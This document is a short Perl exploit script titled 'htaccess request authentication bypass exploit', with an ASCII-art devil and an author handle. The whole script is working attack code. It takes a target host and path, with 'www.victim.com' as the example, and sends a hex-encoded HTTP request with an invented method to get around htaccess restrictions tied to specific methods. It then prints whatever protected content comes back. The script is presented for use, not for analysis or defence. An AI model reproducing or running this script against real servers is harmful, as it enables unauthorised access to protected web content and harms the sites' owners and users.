Code:
use IO::Socket; use strict; use warnings; # __________________________________________________ # # ------------------------------------------------ # | htaccess request authentication bypass exploit | # ------------------------------------------------ # # written by katharsis - www.katharsis.x2.to # # __________________________________________________ <<i; ( ) |\ _,--------._ / | | `.,' `. / | ` ' ,-' ' \/ ( / ,-. ,-. `__,' | \) ,' ) ,'.` | `.#/) '.#_,' ) ))| / (_.)\ . -'// ( /\____/\ ) )`'\ \ |V----V|| ' , \ |`- -- -' ,' \ \ _____ ___ | .' \ \ `._,-' `- `.__,`---^---' \ ` -' -.______ \ . / ______,- `. ,' The devil is and always has been a gentleman. i my $host = shift; my $file = shift; print "\n[ htaccess request authentication bypass exploit ]\n"; if (!$file) { print "\n usage htxploit.pl [host] [directory / file]"; print "\n example htxploit.pl www.victim.com /forums/\n\n"; exit; } my $socket = new IO::Socket::INET ( PeerAddr => $host, PeerPort => '80', Proto => 'tcp', ); my $packet = "\x4D\x58\x48\x5A\x4D\x58\x20".$file. "\x20\x48\x54\x54\x50\x2F\x31\x2E\x31\n". "\x48\x6F\x73\x74\x3A\x20".$host."\n\n\n"; print $socket $packet; while(<$socket>) { print; } close($socket);